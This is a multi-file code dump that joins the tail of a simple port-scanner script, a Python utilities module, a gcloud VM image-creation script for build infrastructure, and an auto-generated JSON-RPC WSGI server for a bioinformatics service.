print("Open ports are:", open_ports)
run_scanner(100, 1)
input()
|
utils.py
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
# vim: set et sw=4 ts=4 sts=4 ff=unix fenc=utf8:
# Author: Binux<i@binux.me>
# http://binux.me
# Created on 2012-11-06 11:50:13
import logging
import hashlib
import datetime
import base64
import six
from six import iteritems
md5string = lambda x: hashlib.md5(utf8(x)).hexdigest()
class ReadOnlyDict(dict):
"""A Read Only Dict"""
def __setitem__(self, key, value):
raise Exception("dict is read-only")
def getitem(obj, key=0, default=None):
"""Get first element of list or return default"""
try:
return obj[key]
except:
return default
def hide_me(tb, g=globals()):
"""Hide stack traceback of given stack"""
base_tb = tb
try:
while tb and tb.tb_frame.f_globals is not g:
tb = tb.tb_next
while tb and tb.tb_frame.f_globals is g:
tb = tb.tb_next
except Exception as e:
logging.exception(e)
tb = base_tb
if not tb:
tb = base_tb
return tb
def run_in_thread(func, *args, **kwargs):
"""Run function in thread, return a Thread object"""
from threading import Thread
thread = Thread(target=func, args=args, kwargs=kwargs)
thread.daemon = True
thread.start()
return thread
def run_in_subprocess(func, *args, **kwargs):
"""Run function in subprocess, return a Process object"""
from multiprocessing import Process
thread = Process(target=func, args=args, kwargs=kwargs)
thread.daemon = True
thread.start()
return thread
def format_date(date, gmt_offset=0, relative=True, shorter=False, full_format=False):
"""Formats the given date (which should be GMT).
By default, we return a relative time (e.g., "2 minutes ago"). You
can return an absolute date string with ``relative=False``.
You can force a full format date ("July 10, 1980") with
``full_format=True``.
This method is primarily intended for dates in the past.
For dates in the future, we fall back to full format.
From tornado
"""
if not date:
return '-'
if isinstance(date, float) or isinstance(date, int):
date = datetime.datetime.utcfromtimestamp(date)
now = datetime.datetime.utcnow()
if date > now:
if relative and (date - now).seconds < 60:
            # Due to clock skew, timestamps can sometimes appear slightly
            # in the future. Round timestamps in the immediate future
            # down to now in relative mode.
date = now
else:
# Otherwise, future dates always use the full format.
full_format = True
local_date = date - datetime.timedelta(minutes=gmt_offset)
local_now = now - datetime.timedelta(minutes=gmt_offset)
local_yesterday = local_now - datetime.timedelta(hours=24)
difference = now - date
seconds = difference.seconds
days = difference.days
format = None
if not full_format:
if relative and days == 0:
if seconds < 50:
return ("1 second ago" if seconds <= 1 else
"%(seconds)d seconds ago") % {"seconds": seconds}
if seconds < 50 * 60:
minutes = round(seconds / 60.0)
return ("1 minute ago" if minutes <= 1 else
"%(minutes)d minutes ago") % {"minutes": minutes}
hours = round(seconds / (60.0 * 60))
return ("1 hour ago" if hours <= 1 else
"%(hours)d hours ago") % {"hours": hours}
if days == 0:
format = "%(time)s"
elif days == 1 and local_date.day == local_yesterday.day and \
relative:
format = "yesterday" if shorter else "yesterday at %(time)s"
elif days < 5:
format = "%(weekday)s" if shorter else "%(weekday)s at %(time)s"
elif days < 334: # 11mo, since confusing for same month last year
format = "%(month)s-%(day)s" if shorter else \
"%(month)s-%(day)s at %(time)s"
if format is None:
format = "%(month_name)s %(day)s, %(year)s" if shorter else \
"%(month_name)s %(day)s, %(year)s at %(time)s"
str_time = "%d:%02d" % (local_date.hour, local_date.minute)
return format % {
"month_name": local_date.strftime('%b'),
"weekday": local_date.strftime('%A'),
"day": str(local_date.day),
"year": str(local_date.year),
"month": local_date.month,
"time": str_time
}
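# Example (illustrative): a timestamp two minutes in the past takes the
# relative branch above and yields "2 minutes ago"; with relative=False a
# same-day date falls through to the "%(time)s" format (e.g. "11:50").
#
#   import time
#   format_date(time.time() - 120)                   # -> "2 minutes ago"
#   format_date(time.time() - 120, relative=False)   # -> e.g. "11:50"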
class TimeoutError(Exception):
pass
try:
import signal
if not hasattr(signal, 'SIGALRM'):
raise ImportError('signal')
class timeout:
"""
Time limit of command
with timeout(3):
time.sleep(10)
"""
def __init__(self, seconds=1, error_message='Timeout'):
self.seconds = seconds
self.error_message = error_message
def handle_timeout(self, signum, frame):
raise TimeoutError(self.error_message)
def __enter__(self):
if self.seconds:
signal.signal(signal.SIGALRM, self.handle_timeout)
signal.alarm(self.seconds)
def __exit__(self, type, value, traceback):
if self.seconds:
signal.alarm(0)
except ImportError:
class timeout:
"""
Time limit of command (for windows)
"""
def __init__(self, seconds=1, error_message='Timeout'):
pass
def __enter__(self):
pass
def __exit__(self, type, value, traceback):
pass
def utf8(string):
"""
    Make sure string is utf8-encoded bytes.
    If the parameter is an object, object.__str__ will be called before it is encoded as bytes.
"""
if isinstance(string, six.text_type):
return string.encode('utf8')
elif isinstance(string, six.binary_type):
return string
else:
return six.text_type(string).encode('utf8')
def text(string, encoding='utf8'):
"""
    Make sure string is of unicode type, decoding it with the given encoding if it's not.
    If the parameter is an object, object.__str__ will be called first.
"""
if isinstance(string, six.text_type):
return string
elif isinstance(string, six.binary_type):
return string.decode(encoding)
else:
return six.text_type(string)
def pretty_unicode(string):
"""
    Make sure string is unicode; try to decode it with utf8, falling back to a unicode-escaped representation if that fails.
"""
if isinstance(string, six.text_type):
return string
try:
return string.decode("utf8")
except UnicodeDecodeError:
return string.decode('Latin-1').encode('unicode_escape').decode("utf8")
def unicode_string(string):
"""
    Make sure string is unicode; try to decode it with utf8, falling back to base64 if that fails.
    Can be decoded by `decode_unicode_string`.
"""
if isinstance(string, six.text_type):
return string
try:
return string.decode("utf8")
except UnicodeDecodeError:
return '[BASE64-DATA]' + base64.b64encode(string) + '[/BASE64-DATA]'
def unicode_dict(_dict):
"""
    Make sure the keys and values of the dict are unicode.
"""
r = {}
for k, v in iteritems(_dict):
r[unicode_string(k)] = unicode_obj(v)
return r
def unicode_list(_list):
"""
    Make sure every element in the list is unicode. Bytes will be encoded in base64.
"""
return [unicode_obj(x) for x in _list]
def unicode_obj(obj):
"""
    Make sure the keys and values of a dict/list/tuple are unicode. Bytes will be encoded in base64.
    Can be decoded by `decode_unicode_obj`.
"""
if isinstance(obj, dict):
return unicode_dict(obj)
elif isinstance(obj, (list, tuple)):
return unicode_list(obj)
elif isinstance(obj, six.string_types):
return unicode_string(obj)
elif isinstance(obj, (int, float)):
return obj
elif obj is None:
return obj
else:
try:
return text(obj)
except:
return text(repr(obj))
def decode_unicode_string(string):
"""
Decode string encoded by `unicode_string`
"""
if string.startswith('[BASE64-DATA]') and string.endswith('[/BASE64-DATA]'):
return base64.b64decode(string[len('[BASE64-DATA]'):-len('[/BASE64-DATA]')])
return string
def decode_unicode_obj(obj):
"""
    Decode a dict/list/tuple encoded by `unicode_obj`.
"""
if isinstance(obj, dict):
r = {}
for k, v in iteritems(obj):
r[decode_unicode_string(k)] = decode_unicode_obj(v)
return r
elif isinstance(obj, six.string_types):
return decode_unicode_string(obj)
elif isinstance(obj, (list, tuple)):
return [decode_unicode_obj(x) for x in obj]
else:
return obj
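# Round-trip sketch (illustrative; Python 2 semantics, where non-UTF-8 byte
# strings hit the base64 branch in unicode_string):
#
#   encoded = unicode_obj({'key': '\xff\xfe raw bytes'})
#   # -> {u'key': '[BASE64-DATA]...[/BASE64-DATA]'}
#   decode_unicode_obj(encoded)
#   # -> {u'key': '\xff\xfe raw bytes'}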
class Get(object):
"""
    Lazy value calculation for an object.
"""
def __init__(self, getter):
self.getter = getter
def __get__(self, instance, owner):
return self.getter()
class ObjectDict(dict):
"""
    Object-like dict: every dict[key] can be accessed as dict.key.
    If dict[key] is a `Get`, its value is calculated lazily.
"""
def __getattr__(self, name):
ret = self.__getitem__(name)
if hasattr(ret, '__get__'):
return ret.__get__(self, ObjectDict)
return ret
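# Usage sketch (illustrative): attribute-style access, with a `Get` member
# evaluated lazily on every lookup.
#
#   d = ObjectDict(host='example', now=Get(lambda: datetime.datetime.utcnow()))
#   d.host   # -> 'example'
#   d.now    # -> a fresh datetime on each attribute access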
def load_object(name):
"""Load object from module"""
if "." not in name:
        raise Exception("load_object requires a full 'module.object' path")
module_name, object_name = name.rsplit('.', 1)
if six.PY2:
module = __import__(module_name, globals(), locals(), [utf8(object_name)], -1)
else:
module = __import__(module_name, globals(), locals(), [object_name])
return getattr(module, object_name)
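# Example (illustrative): load_object('os.path.join') imports os.path and
# returns its join function; a name without a dot raises the Exception above.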
def get_python_console(namespace=None):
"""
    Return an interactive python console instance with the caller's stack.
"""
if namespace is None:
import inspect
frame = inspect.currentframe()
caller = frame.f_back
if not caller:
logging.error("can't find caller who start this console.")
caller = frame
namespace = dict(caller.f_globals)
namespace.update(caller.f_locals)
try:
from IPython.terminal.interactiveshell import TerminalInteractiveShell
shell = TerminalInteractiveShell(user_ns=namespace)
except ImportError:
try:
import readline
import rlcompleter
readline.set_completer(rlcompleter.Completer(namespace).complete)
readline.parse_and_bind("tab: complete")
except ImportError:
pass
import code
shell = code.InteractiveConsole(namespace)
shell._quit = False
def exit():
shell._quit = True
def readfunc(prompt=""):
if shell._quit:
raise EOFError
return six.moves.input(prompt)
# inject exit method
shell.ask_exit = exit
shell.raw_input = readfunc
return shell
def python_console(namespace=None):
"""Start a interactive python console with caller's stack"""
if namespace is None:
import inspect
frame = inspect.currentframe()
caller = frame.f_back
if not caller:
logging.error("can't find caller who start this console.")
caller = frame
namespace = dict(caller.f_globals)
namespace.update(caller.f_locals)
return get_python_console(namespace=namespace).interact()
|
create_images.py
|
#!/usr/bin/env python3
#
# Copyright 2018 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from datetime import datetime
import json
import os
import queue
import subprocess
import sys
import tempfile
import threading
import gcloud
import gcloud_utils
DEBUG = False
IMAGE_CREATION_VMS = {
# Find the newest FreeBSD 11 image via:
# gcloud compute images list --project freebsd-org-cloud-dev \
# --no-standard-images
# ('bk-freebsd11',): {
# 'source_image': 'https://www.googleapis.com/compute/v1/projects/freebsd-org-cloud-dev/global/images/freebsd-11-1-stable-amd64-2017-12-28',
# 'scripts': [
# 'setup-freebsd.sh',
# 'install-buildkite-agent.sh'
# ]
# },
"bk-docker": {
"project": "bazel-untrusted",
"zone": "europe-north1-a",
"source_image_project": "ubuntu-os-cloud",
"source_image_family": "ubuntu-1804-lts",
"setup_script": "setup-docker.sh",
"licenses": [
"https://www.googleapis.com/compute/v1/projects/vm-options/global/licenses/enable-vmx"
],
},
"bk-trusted-docker": {
"project": "bazel-public",
"zone": "europe-west1-c",
"source_image_project": "ubuntu-os-cloud",
"source_image_family": "ubuntu-1804-lts",
"setup_script": "setup-docker.sh",
"licenses": [
"https://www.googleapis.com/compute/v1/projects/vm-options/global/licenses/enable-vmx"
],
},
"bk-windows-java8": {
"project": "bazel-untrusted",
"zone": "europe-north1-a",
"source_image_project": "windows-cloud",
"source_image_family": "windows-1803-core",
"setup_script": "setup-windows.ps1",
},
"bk-trusted-windows-java8": {
"project": "bazel-public",
"zone": "europe-west1-c",
"source_image_project": "windows-cloud",
"source_image_family": "windows-1803-core",
"setup_script": "setup-windows.ps1",
},
"windows-playground": {
"project": "di-cloud-exp",
"zone": "europe-west1-c",
"network": "default",
"source_image_project": "windows-cloud",
"source_image_family": "windows-2019",
"setup_script": "setup-windows.ps1",
},
}
WORK_QUEUE = queue.Queue()
def run(args, **kwargs):
return subprocess.run(args, **kwargs)
def preprocess_setup_script(setup_script, is_windows):
output_file = tempfile.mkstemp()[1]
newline = "\r\n" if is_windows else "\n"
with open(output_file, "w", newline=newline) as f:
with open(setup_script, "r") as setup_script_file:
if is_windows:
f.write("$setup_script = @'\n")
f.write(setup_script_file.read() + "\n")
if is_windows:
f.write("'@\n")
f.write('[System.IO.File]::WriteAllLines("c:\\setup.ps1", $setup_script)\n')
return output_file
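# Note on preprocess_setup_script (descriptive, not from the original source):
# for Windows images the returned temp file is a small PowerShell wrapper that
# embeds the real setup script in a here-string and writes it to c:\setup.ps1,
# roughly:
#
#   $setup_script = @'
#   <contents of setup-windows.ps1>
#   '@
#   [System.IO.File]::WriteAllLines("c:\setup.ps1", $setup_script)
#
# The operator then runs C:\setup.ps1 over RDP (see print_windows_instructions
# below); Linux images receive the setup script verbatim as their startup script.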
def create_instance(instance_name, params):
is_windows = "windows" in instance_name
setup_script = preprocess_setup_script(params["setup_script"], is_windows)
try:
if is_windows:
startup_script = "windows-startup-script-ps1=" + setup_script
else:
startup_script = "startup-script=" + setup_script
if "source_image" in params:
image = {"image": params["source_image"]}
else:
image = {
"image-project": params["source_image_project"],
"image-family": params["source_image_family"],
}
gcloud.create_instance(
instance_name,
project=params["project"],
zone=params["zone"],
machine_type="n1-standard-8",
network=params.get("network", "buildkite"),
metadata_from_file=startup_script,
min_cpu_platform="Intel Skylake",
boot_disk_type="pd-ssd",
boot_disk_size="50GB",
**image,
)
finally:
os.remove(setup_script)
# https://stackoverflow.com/a/25802742
def write_to_clipboard(output):
process = subprocess.Popen("pbcopy", env={"LANG": "en_US.UTF-8"}, stdin=subprocess.PIPE)
process.communicate(output.encode("utf-8"))
def print_windows_instructions(project, zone, instance_name):
tail_start = gcloud_utils.tail_serial_console(
instance_name, project=project, zone=zone, until="Finished running startup scripts"
)
pw = json.loads(
gcloud.reset_windows_password(
instance_name, format="json", project=project, zone=zone
).stdout
)
rdp_file = tempfile.mkstemp(suffix=".rdp")[1]
with open(rdp_file, "w") as f:
f.write("full address:s:" + pw["ip_address"] + "\n")
f.write("username:s:" + pw["username"] + "\n")
subprocess.run(["open", rdp_file])
write_to_clipboard(pw["password"])
with gcloud.PRINT_LOCK:
print("Use this password to connect to the Windows VM: " + pw["password"])
print("Please run the setup script C:\\setup.ps1 once you're logged in.")
# Wait until the VM reboots once, then open RDP again.
tail_start = gcloud_utils.tail_serial_console(
instance_name,
project=project,
zone=zone,
start=tail_start,
until="Finished running startup scripts",
)
print("Connecting via RDP a second time to finish the setup...")
write_to_clipboard(pw["password"])
run(["open", rdp_file])
return tail_start
def workflow(name, params):
instance_name = "%s-image-%s" % (name, int(datetime.now().timestamp()))
project = params["project"]
zone = params["zone"]
try:
# Create the VM.
create_instance(instance_name, params)
# Wait for the VM to become ready.
gcloud_utils.wait_for_instance(instance_name, project=project, zone=zone, status="RUNNING")
if "windows" in instance_name:
# Wait for VM to be ready, then print setup instructions.
tail_start = print_windows_instructions(project, zone, instance_name)
# Continue printing the serial console until the VM shuts down.
gcloud_utils.tail_serial_console(
instance_name, project=project, zone=zone, start=tail_start
)
else:
# Continuously print the serial console.
gcloud_utils.tail_serial_console(instance_name, project=project, zone=zone)
# Wait for the VM to completely shutdown.
gcloud_utils.wait_for_instance(
instance_name, project=project, zone=zone, status="TERMINATED"
)
# Create a new image from our VM.
gcloud.create_image(
instance_name,
project=project,
family=name,
source_disk=instance_name,
source_disk_zone=zone,
licenses=params.get("licenses", []),
)
finally:
gcloud.delete_instance(instance_name, project=project, zone=zone)
def worker():
while True:
item = WORK_QUEUE.get()
if not item:
break
try:
workflow(**item)
finally:
WORK_QUEUE.task_done()
def main(argv=None):
if argv is None:
argv = sys.argv[1:]
if not argv:
print("Usage: create_images.py {}".format(" ".join(IMAGE_CREATION_VMS.keys())))
return 1
unknown_args = set(argv).difference(IMAGE_CREATION_VMS.keys())
if unknown_args:
print(
"Unknown platforms: {}\nAvailable platforms: {}".format(
", ".join(unknown_args), ", ".join(IMAGE_CREATION_VMS.keys())
)
)
return 1
if subprocess.check_output(["git", "status", "--porcelain"], universal_newlines=True).strip():
print(
"There are pending changes in your Git repository. You have to commit "
"them, before create_images.py can continue.",
file=sys.stderr,
)
return 1
# Put VM creation instructions into the work queue.
for name in argv:
WORK_QUEUE.put({"name": name, "params": IMAGE_CREATION_VMS[name]})
# Spawn worker threads that will create the VMs.
threads = []
for _ in range(WORK_QUEUE.qsize()):
t = threading.Thread(target=worker)
t.start()
threads.append(t)
# Wait for all VMs to be created.
WORK_QUEUE.join()
# Signal worker threads to exit.
for _ in range(len(threads)):
WORK_QUEUE.put(None)
# Wait for worker threads to exit.
for t in threads:
t.join()
return 0
if __name__ == "__main__":
sys.exit(main())
|
kb_trimmomaticServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from wsgiref.simple_server import make_server
import sys
import json
import traceback
import datetime
from multiprocessing import Process
from getopt import getopt, GetoptError
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError,\
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from os import environ
from ConfigParser import ConfigParser
from biokbase import log
import requests as _requests
import random as _random
import os
from kb_trimmomatic.authclient import KBaseAuth as _KBaseAuth
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'kb_trimmomatic'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from kb_trimmomatic.kb_trimmomaticImpl import kb_trimmomatic # noqa @IgnorePep8
impl_kb_trimmomatic = kb_trimmomatic(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if isinstance(e.message, basestring):
newerr.data = e.message
else:
# Some exceptions embed other exceptions as the message
newerr.data = repr(e.message)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if self.method_data[request['method']].has_key('types'): # noqa @IgnorePep8
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
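# Illustrative example (hypothetical WSGI environ): when the X-* headers are
# trusted, {'HTTP_X_FORWARDED_FOR': '10.0.0.5, 192.168.1.1',
# 'REMOTE_ADDR': '127.0.0.1'} resolves to '10.0.0.5'; with
# dont_trust_x_ip_headers set to 'true' in the config, the function falls
# back to REMOTE_ADDR, i.e. '127.0.0.1'.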
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'kb_trimmomatic'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_kb_trimmomatic.runTrimmomatic,
name='kb_trimmomatic.runTrimmomatic',
types=[dict])
self.method_authentication['kb_trimmomatic.runTrimmomatic'] = 'required' # noqa
self.rpc_service.add(impl_kb_trimmomatic.execTrimmomatic,
name='kb_trimmomatic.execTrimmomatic',
types=[dict])
self.method_authentication['kb_trimmomatic.execTrimmomatic'] = 'required' # noqa
self.rpc_service.add(impl_kb_trimmomatic.execTrimmomaticSingleLibrary,
name='kb_trimmomatic.execTrimmomaticSingleLibrary',
types=[dict])
self.method_authentication['kb_trimmomatic.execTrimmomaticSingleLibrary'] = 'required' # noqa
self.rpc_service.add(impl_kb_trimmomatic.status,
name='kb_trimmomatic.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'kb_trimmomatic ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception, e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print 'Request method was %s\n' % environ['REQUEST_METHOD']
# print 'Environment dictionary is:\n%s\n' % pprint.pformat(environ)
# print 'Request body was: %s' % request_body
# print 'Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result)
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run using the single-threaded Python BaseHTTP service,
# listening on port 9999 by default, execute this file directly
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print "Monkeypatching std libraries for async"
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
    By default, will start the server on localhost on a system-assigned port
    in the main thread. Execution of the main thread will stay in the server
    main loop until interrupted. To run the server in a separate process, and
    thus allow the stop_server method to be called, set newprocess=True. This
    also allows the port number to be returned (see the usage sketch after
    stop_server below).'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print "Listening on port %s" % port
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
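# Hedged usage sketch (not part of the generated service code): start the
# server in a child process on a system-assigned port, talk to it, then stop
# it. Only the start_server/stop_server helpers defined above are assumed.
#
#     port = start_server(host='localhost', port=0, newprocess=True)
#     # ... point a JSON-RPC client at http://localhost:<port>/ ...
#     stop_server()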
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
